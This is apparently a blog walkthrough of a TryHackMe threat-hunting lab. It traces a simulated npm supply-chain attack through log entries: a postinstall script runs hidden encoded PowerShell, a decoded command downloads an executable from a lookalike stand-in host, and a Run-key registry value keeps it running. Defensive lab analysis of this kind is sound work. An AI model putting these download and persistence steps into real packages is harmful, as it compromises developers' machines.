TryHackMe - Threat Hunting Simulator - Health Hazard

-



 



Scenario overview


After months of juggling content calendars and caffeine-fueled brainstorming, co-founder Tom Whiskers finally carved out time to build the company’s first website. It was supposed to be simple: follow a tutorial, install a few packages, and bring the brand to life with lightweight JavaScript magic.

 

But between sleepless nights and copy-pasted code, Tom started feeling off. Not sick exactly, just off. The terminal scrolled with reassuring green text, the site loaded fine, and everything looked normal.

 

Then, a strange file appeared on the system. No one could say where it came from. It wasn’t part of the tutorial, didn’t match any known dependencies, and didn’t even run.

 

It just waited.

 

Scenario objectives


  • Determine how a threat actor first gained a foothold on the system. Identify suspicious activity that may point to the initial compromise method.
  • Investigate signs of malicious execution following the initial access. Analyse the logs and system behaviour to uncover the attacker's actions.
  • Identify any mechanisms the attacker used to maintain access across system restarts or user sessions. Look for indicators of persistence that could allow long-term control.




Initial Access – Supply Chain Attack:

Process Created: node.exe -c npm install healthchk-lib@1.0.1

CommandLine: "C:\Program Files\nodejs\node.exe"

[21/06/2025 10:58:27 AM]
Process Created:
Image: powershell.exe
Parent: cmd.exe
CommandLine: powershell.exe -NoP -W Hidden -EncodedCommand ...
→ Triggered from: C:\Development\node_modules\healthchk-lib\scripts\postinstall.ps1

After installation, postinstall.ps1 is automatically run.



Execution – Obfuscated PowerShell

Process Created: powershell.exe
ParentImage: cmd.exe
GrandParentImage: node.exe
CommandLine: powershell.exe -NoP -W Hidden -EncodedCommand JABkAGUAcw...

[21/06/2025 10:58:27 AM]
Decoded Command:
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
Invoke-WebRequest -Uri $url -OutFile $dest


Here appears the Base64 encoded PowerShell command that downloads the payload.



Persistence – Registry Run Key

[21/06/2025 10:58:27 AM]
Event ID: 13 (Registry SetValue)
TargetObject:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value Name: Windows Update Monitor
Value Data: powershell.exe -NoP -W Hidden -EncodedCommand ...


EventID: 13 (Registry SetValue)
TargetObject: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Details: Windows Update Monitor → powershell.exe -NoP -W Hidden -EncodedCommand ...

It confirms persistence on the user's system via Run Key.



Thank you for watching 

and

I hope you enjoy with this challange !! 












Comments

Post a Comment

Popular posts from this blog

TryHackMe - Typo Snare Threat Hunter Simulator (medium level)

-
Image
  Threat Hunt Walkthrough The "Typo Snare" scenario on TryHackMe is a fantastic real-world simulation of a sophisticated, multi-stage attack. It starts with a simple mistake and escalates to a full domain compromise, culminating in ransomware. This post will walk you through the entire attack chain, phase by phase, showing you how to find each piece of evidence using Elastic KQL queries. Phase 1: Initial Access & Execution What Happened: The attack began when the user perry.parsons on workstation WKSTN-03 needed a 7-Zip tool. He googled it, clicked a typosquatted link ( 7zipp.org ), and downloaded a trojanized installer. This installer executed a PowerShell script ( 7z.ps1 ) directly from the attacker's server to establish the initial foothold. How to Find It: You are looking for a PowerShell process that was likely spawned by a browser and contains a command to download and execute a script ( iwr for Invoke-WebRequest and iex for Invoke-Expression ). KQL Query...
Read more

Phishing Unfolding SIM (SOC Simulator TryHackMe)

-
Image
        Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyze and document each phase of the breach as it happens. First I let all the alert to come to correlate them together. You start from the CRITICAL ones (0 alert) - HIGH - MEDIUM - LOW. I check all dns alert , all of them was false positive , nothing suspicious . On the Process ones you must to check on splunk , search on google if you don't know the specific process . I make one mistake , with the attashments invoice.pdf.ink , apparently it was true positive , but I check the SHA-256 on VirusTotal , nothing suspicious..  I realy enjoy with this SIM , Have Fun !! 
Read more